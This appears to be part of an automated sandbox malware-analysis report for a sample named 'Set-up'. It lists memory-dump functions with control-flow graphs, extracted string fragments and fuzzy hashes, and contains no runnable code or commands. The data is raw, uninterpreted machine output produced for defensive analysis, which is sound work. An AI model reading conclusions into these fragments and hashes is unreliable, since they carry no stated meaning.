                                                                                                                                                                                                                                                              control_flow_graph 1179 221b098-221b0a6 1180 221b5fc 1179->1180 1181 221b0ac-221b137 call 2217908 call 2219a38 1179->1181 1182 221b5fe-221b60a 1180->1182 1187 221b138-221b156 1181->1187 1187->1187 1188 221b158-221b183 call 221a9b8 1187->1188 1191 221b188-221b1b3 1188->1191 1191->1191 1192 221b1b5-221b1da call 221a9b8 1191->1192 1195 221b1e8-221b1fc 1192->1195 1195->1195 1196 221b1fe-221b25a call 221a9b8 1195->1196 1199 221b268-221b27c 1196->1199 1199->1199 1200 221b27e-221b2a0 1199->1200 1201 221b2a8-221b2e8 1200->1201 1201->1201 1202 221b2ea-221b33f call 221a9b8 1201->1202 1205 221b348-221b38d 1202->1205 1205->1205 1206 221b38f-221b47c call 221aca8 1205->1206 1209 221b488-221b4fd 1206->1209 1209->1209 1210 221b4ff-221b50b 1209->1210 1211 221b529-221b538 1210->1211 1212 221b50d-221b511 1210->1212 1214 221b559-221b592 1211->1214 1215 221b53a-221b53d 1211->1215 1213 221b518-221b527 1212->1213 1213->1211 1213->1213 1217 221b598-221b5b9 1214->1217 1216 221b548-221b557 1215->1216 1216->1214 1216->1216 1217->1217 1218 221b5bb-221b5fa call 221dca8 call 2219a48 1217->1218 1218->1182
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 5R7$%$&Y>[$)I>K$;E3G$=],_$B1O3$E%T'$P-Z/$TU$U)_+$Y!R#$Z=A?$`A C$myjl$pmta
                                                                                                                                                                                                                                                              • API String ID: 0-2094768151
                                                                                                                                                                                                                                                              • Opcode ID: 496f5d5014a982b636e88f5523d4f8796f5df99a27f3452b6a04d955d1ce9780
                                                                                                                                                                                                                                                              • Instruction ID: 7dffc974e3083f51828ceef8afb80a843ec1a561dab8a660df14c48786877964
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 496f5d5014a982b636e88f5523d4f8796f5df99a27f3452b6a04d955d1ce9780
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5D102B11487518BD324DF64C854BAFFBE2EFD2304F188A2CE4D48B295DB798509CB92
                                                                                                                                                                                                                                                              Function 0224F1E8 Relevance: 12.8, Strings: 10, Instructions: 290COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1292 224f1e8-224f20e 1293 224f213-224f21e 1292->1293 1293->1293 1294 224f220 1293->1294 1295 224f222-224f225 1294->1295 1296 224f276-224f292 1295->1296 1297 224f227-224f274 1295->1297 1298 224f297-224f2a2 1296->1298 1297->1295 1298->1298 1299 224f2a4 1298->1299 1300 224f2a6-224f2a9 1299->1300 1301 224f2fa-224f320 1300->1301 1302 224f2ab-224f2f8 1300->1302 1303 224f325-224f330 1301->1303 1302->1300 1303->1303 1304 224f332 1303->1304 1305 224f334-224f337 1304->1305 1306 224f370-224f376 1305->1306 1307 224f339-224f36e 1305->1307 1308 224f5c3-224f5c5 1306->1308 1309 224f37c-224f398 1306->1309 1307->1305 1313 224f5c7-224f5c9 1308->1313 1310 224f39d-224f3a8 1309->1310 1310->1310 1312 224f3aa 1310->1312 1314 224f3ac-224f3af 1312->1314 1315 224f5cf-224f5de 1313->1315 1316 224f3b1-224f3d9 1314->1316 1317 224f3db-224f3df 1314->1317 1316->1314 1317->1308 1318 224f3e5-224f401 1317->1318 1319 224f406-224f411 1318->1319 1319->1319 1320 224f413 1319->1320 1321 224f415-224f418 1320->1321 1322 224f44d-224f456 1321->1322 1323 224f41a-224f44b 1321->1323 1322->1308 1324 224f45c-224f4a2 1322->1324 1323->1321 1326 224f4a4-224f4a7 1324->1326 1327 224f4ad-224f529 1326->1327 1328 224f52e-224f532 1326->1328 1327->1326 1328->1308 1329 224f538-224f554 1328->1329 1330 224f559-224f564 1329->1330 1330->1330 1331 224f566 1330->1331 1332 224f568-224f56b 1331->1332 1333 224f5b6-224f5bf 1332->1333 1334 224f56d-224f5b4 1332->1334 1333->1313 1335 224f5c1-224f5cd 1333->1335 1334->1332 1335->1315
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 1$2$4$B$D$E$F$G$b$}Mu
                                                                                                                                                                                                                                                              • API String ID: 0-3160144725
                                                                                                                                                                                                                                                              • Opcode ID: c575e92557c99177f9cd21af5c8c5142a877cfc280f5d876abeda833088a410e
                                                                                                                                                                                                                                                              • Instruction ID: 5ee2a8224702095e2b92bc0fda641b656944935a8df55f0a5a35fae530c39b20
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c575e92557c99177f9cd21af5c8c5142a877cfc280f5d876abeda833088a410e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBB1696262C7D14AC729867C981432FAFC157E2218F0C8EADE4E2CB7D7D9A9C405C753
                                                                                                                                                                                                                                                              Function 0221ACA8 Relevance: 10.4, Strings: 8, Instructions: 371COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: '>*!$*639$.$/50x$KJ$hc$i'm.$pk5)
                                                                                                                                                                                                                                                              • API String ID: 0-1353547867
                                                                                                                                                                                                                                                              • Opcode ID: 9d80dbe84dc67f0f59595852f87e424240d060aa14ae03b574ac1ed13a6644ee
                                                                                                                                                                                                                                                              • Instruction ID: e5ff2868808a3cd45c7b409559cdbf4866038d0433790a30e94681ec629343f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d80dbe84dc67f0f59595852f87e424240d060aa14ae03b574ac1ed13a6644ee
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03B1E77125D3828BD3268F6884A076BFFE0AFE7344F08496CE4D05B386D77A854AC756
                                                                                                                                                                                                                                                              Function 022349E8 Relevance: 9.3, Strings: 7, Instructions: 502COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: !@$'$,$J$m$m$r
                                                                                                                                                                                                                                                              • API String ID: 0-3940219623
                                                                                                                                                                                                                                                              • Opcode ID: 3808121648b5745d85930b8dc04967832c50add5c78604a7439569329b7225cc
                                                                                                                                                                                                                                                              • Instruction ID: ceab2f07879f00c3568a15680d9b8f7c3475906db73294ebc09983b3385afc9f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3808121648b5745d85930b8dc04967832c50add5c78604a7439569329b7225cc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E612C2B162C3418FD3219F68C48436EBBE2ABC9314F58896DE4D9873D6D7B58845CB83
                                                                                                                                                                                                                                                              Function 02249E30 Relevance: 9.0, Strings: 7, Instructions: 291COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $$$$.$.$K$K$M
                                                                                                                                                                                                                                                              • API String ID: 0-2801665918
                                                                                                                                                                                                                                                              • Opcode ID: 382ecb02990192fde52e48b6788cc99637d93d05787e913cd85d105fb445fa57
                                                                                                                                                                                                                                                              • Instruction ID: f9d64c97c333ab6c09f821b8a00bf0274aeb50eb358b3481071cd1af0eba14b3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 382ecb02990192fde52e48b6788cc99637d93d05787e913cd85d105fb445fa57
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCE1497151D3C18EC3758B7894957EBBFE06FEA214F0849AED5D8CA383C57482858B27
                                                                                                                                                                                                                                                              Function 0222A5CC Relevance: 7.8, Strings: 6, Instructions: 283COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (]'_$/Q,S$0A2C$8E?G$8UVW$;Y;[
                                                                                                                                                                                                                                                              • API String ID: 0-2954296438
                                                                                                                                                                                                                                                              • Opcode ID: 5b40631e9ae9a6f0f842efd048358e16b24f329c257bd7d566fbea2f38130da3
                                                                                                                                                                                                                                                              • Instruction ID: 95ac8629e6fa9316118a911f9d9a0029cf29ac580eb5ba39ef0b2b21d59ed2c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b40631e9ae9a6f0f842efd048358e16b24f329c257bd7d566fbea2f38130da3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AA126726183228BD724CF25C89136BB7F1FFC5714F098A2DE8C59B694E7788905C786
                                                                                                                                                                                                                                                              Function 0224FB68 Relevance: 7.2, Strings: 5, Instructions: 974COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 23<=$Gslm$p_]$tu$x<
                                                                                                                                                                                                                                                              • API String ID: 0-335005638
                                                                                                                                                                                                                                                              • Opcode ID: 5b6d2b75d24bda1c36f3ab2243b57368c6c1388ad7a0a30a2306fc743f40bf18
                                                                                                                                                                                                                                                              • Instruction ID: 0587e874f70a1be404e60dfd7a3dce360b244b485120f7bc64086cf21c5b2ee6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b6d2b75d24bda1c36f3ab2243b57368c6c1388ad7a0a30a2306fc743f40bf18
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C062EE726183518FD324CF68C88576BBBE5EBC9314F18C92DE9988B294D778D905CB82
                                                                                                                                                                                                                                                              Function 02215AD8 Relevance: 6.7, Strings: 5, Instructions: 477COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                                                                                                                                                              • API String ID: 0-3469842109
                                                                                                                                                                                                                                                              • Opcode ID: b663f34e84d833c92c8b2ed695d46316ddfb8b0631141d0b82b5d3c6b5b91bae
                                                                                                                                                                                                                                                              • Instruction ID: c09bcbad520b55cd38adb2dd3aaf078bc5d25ca197038c6641f23650503cc134
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b663f34e84d833c92c8b2ed695d46316ddfb8b0631141d0b82b5d3c6b5b91bae
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A80203B06183818FD710CF68CC94B6A7BE1FBE6300F05856DE9858B395D3B9D919CB92
                                                                                                                                                                                                                                                              Function 0222C4A8 Relevance: 5.9, Strings: 4, Instructions: 893COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $$30$LM$|w
                                                                                                                                                                                                                                                              • API String ID: 0-1872391088
                                                                                                                                                                                                                                                              • Opcode ID: 7ff5ada45327dc7d4161f219b37cb99685dce3c89f3c2856ecc66ce2385b4f53
                                                                                                                                                                                                                                                              • Instruction ID: f5fc338a8adc3cb9935a1dd12b64b30001cbbcd9ade26389d059c34c70305ae7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ff5ada45327dc7d4161f219b37cb99685dce3c89f3c2856ecc66ce2385b4f53
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C46225B0628311ABE724DF64CC4072FB7E2EFC5314F15862EE4959B2A9D772D849CB42
                                                                                                                                                                                                                                                              Function 0221FEE2 Relevance: 5.8, Strings: 4, Instructions: 768COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 2x$u}$wrq|$}t
                                                                                                                                                                                                                                                              • API String ID: 0-2818379622
                                                                                                                                                                                                                                                              • Opcode ID: e4fabe09f52ee5eef4858d0713cb36d32accb540f3329c243a1674b1dbfc2d50
                                                                                                                                                                                                                                                              • Instruction ID: 72e9e647585d396151f9f203003de4fffa583133cc318f1135d8ed0fbebb4004
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4fabe09f52ee5eef4858d0713cb36d32accb540f3329c243a1674b1dbfc2d50
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F43212746147818FD719CF69C4A0366BFE2EF96304F2881ADC8968F796C77AD40ACB50
                                                                                                                                                                                                                                                              Function 0222D4C8 Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: @~$@~$f$x~
                                                                                                                                                                                                                                                              • API String ID: 0-660555072
                                                                                                                                                                                                                                                              • Opcode ID: a87f4a51b12a4cc729704f7d967d4c70776f633f09d70d05e82141beb852cfc4
                                                                                                                                                                                                                                                              • Instruction ID: d3a48d13eb53840a0d911590567a1733bca78235ef97ce82ef1c9afa8f0aaec7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a87f4a51b12a4cc729704f7d967d4c70776f633f09d70d05e82141beb852cfc4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32511DB15193518FE314DF66C8507ABBBE2EFC2304F08896CE4C58B394E7B98409CB92
                                                                                                                                                                                                                                                              Function 02241636 Relevance: 5.2, Strings: 4, Instructions: 206COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: &@^c$&@^c$8+2|$;))5
                                                                                                                                                                                                                                                              • API String ID: 0-1423208211
                                                                                                                                                                                                                                                              • Opcode ID: c6fafdf987b5a26d742b91ed38edbcb6ec46f432115fac606bfe082d505b4872
                                                                                                                                                                                                                                                              • Instruction ID: 51950e070d3c7398b21d828119aeb353a7eb83dd0310a04a5a104b9ad1f5adf4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6fafdf987b5a26d742b91ed38edbcb6ec46f432115fac606bfe082d505b4872
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C651F32461D3D28BE7398F29D1683ABBFE19FD3205F58846CC0CD9B286CF7540468752
                                                                                                                                                                                                                                                              Function 022415F1 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: &@^c$&@^c$8+2|$;))5
                                                                                                                                                                                                                                                              • API String ID: 0-1423208211
                                                                                                                                                                                                                                                              • Opcode ID: d494e3b99b4a2a9f58661af985d39495884a4700e69c5fed721264f75e4b856b
                                                                                                                                                                                                                                                              • Instruction ID: f0862a6d30185f8ee8f4571bfd351bc79b37f5c5f630fa294173a69a3b2f0200
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d494e3b99b4a2a9f58661af985d39495884a4700e69c5fed721264f75e4b856b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5651232491E3C28AE7798F2990683BBBFE19FD3205F58846CC0CD5B296CF794046CB52
                                                                                                                                                                                                                                                              Function 022415B1 Relevance: 5.2, Strings: 4, Instructions: 156COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: &@^c$&@^c$8+2|$;))5
                                                                                                                                                                                                                                                              • API String ID: 0-1423208211
                                                                                                                                                                                                                                                              • Opcode ID: 17b7ef50837b840f2f37344233fe85feaecfbc7248c357a74b8cf2bc2f120deb
                                                                                                                                                                                                                                                              • Instruction ID: 0774a913b33c01867547219a9ce0d1b712cc740eed7bd2d26e049031521d06ca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17b7ef50837b840f2f37344233fe85feaecfbc7248c357a74b8cf2bc2f120deb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9841023491D3D28ADB398F29D0687ABBBE19FD7205F58885CC0CD5B286CF750006CB42
                                                                                                                                                                                                                                                              Function 02253438 Relevance: 4.4, Strings: 3, Instructions: 603COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: S"(w$S"(w$f
                                                                                                                                                                                                                                                              • API String ID: 0-891790955
                                                                                                                                                                                                                                                              • Opcode ID: cb49ac6858c2018c3d05d2c224e1c1df56aa4ea6ae09b48d6505882631c56b63
                                                                                                                                                                                                                                                              • Instruction ID: 3dbd0508dadd3b6b9bda9da4e79798480aeed6917a45c6bdb716ac29f3e5f247
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb49ac6858c2018c3d05d2c224e1c1df56aa4ea6ae09b48d6505882631c56b63
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 052214716183628FD324DF58C890B2AB7E1EBC5354F18DA6CF8A58B395D371D805CB92
                                                                                                                                                                                                                                                              Function 0222E9C1 Relevance: 4.3, Strings: 3, Instructions: 506COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 30$BIVB$BIVB
                                                                                                                                                                                                                                                              • API String ID: 0-3166255827
                                                                                                                                                                                                                                                              • Opcode ID: beb35e4e253d84354e3855f7aec3ba4b43497494191f6676442f556d80eec32c
                                                                                                                                                                                                                                                              • Instruction ID: e51d0e6c63a46c1bae875c57fad6e9accaeec76af1796a27ac16bc637851fff0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: beb35e4e253d84354e3855f7aec3ba4b43497494191f6676442f556d80eec32c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1020FB2A1C7809FE7049F69C81176FBBE2BBD1304F18895CE1D54B351DB7A85098B87
                                                                                                                                                                                                                                                              Function 0221C4E8 Relevance: 4.2, Strings: 3, Instructions: 424COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: x$RP$VT
                                                                                                                                                                                                                                                              • API String ID: 0-4095361847
                                                                                                                                                                                                                                                              • Opcode ID: 20fe291115fa31f00eed7b7ef80a1fd34bad3fd3d8a394758a1a316c5088f32c
                                                                                                                                                                                                                                                              • Instruction ID: 429a78fcea155a56b47943ccd767802c7c687b97d11501e845ec1983314dcd09
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20fe291115fa31f00eed7b7ef80a1fd34bad3fd3d8a394758a1a316c5088f32c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AD1567665C3918BD325CF6885A076FBBD2ABD1204F18C92DE8D55B389D774880A8B83
                                                                                                                                                                                                                                                              Function 0222A0E2 Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: /p$_016$b
                                                                                                                                                                                                                                                              • API String ID: 0-1245655123
                                                                                                                                                                                                                                                              • Opcode ID: bc1866f05e2ab70399ae028df1b42b19cbee60d4e9c37cb7798280a8d782f55e
                                                                                                                                                                                                                                                              • Instruction ID: 5a104eb8c599a8c13708b28488b6d7c98074f16039651a92cf7b78ae42e01965
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc1866f05e2ab70399ae028df1b42b19cbee60d4e9c37cb7798280a8d782f55e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9A113715183228BC328CF54C8A036BB7F2FFC5714F198A1DE8C96B694E7798949CB46
                                                                                                                                                                                                                                                              Function 0222F518 Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 6$XQ$ak
                                                                                                                                                                                                                                                              • API String ID: 0-1480714512
                                                                                                                                                                                                                                                              • Opcode ID: 339673bfe2ce95ac9e27341b7ef150e128cd3ab914f3a40c8f4fafd3e9b51a9d
                                                                                                                                                                                                                                                              • Instruction ID: 4d36ad29261d46e822f420a578f0637f4b611597fda1048ed19836f1e8b86eca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 339673bfe2ce95ac9e27341b7ef150e128cd3ab914f3a40c8f4fafd3e9b51a9d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9761F7719247118FC724CF68C99066BB7F5FF86310F494A2CE495CB6A8E7B8E544CB81
                                                                                                                                                                                                                                                              Function 0224E42B Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
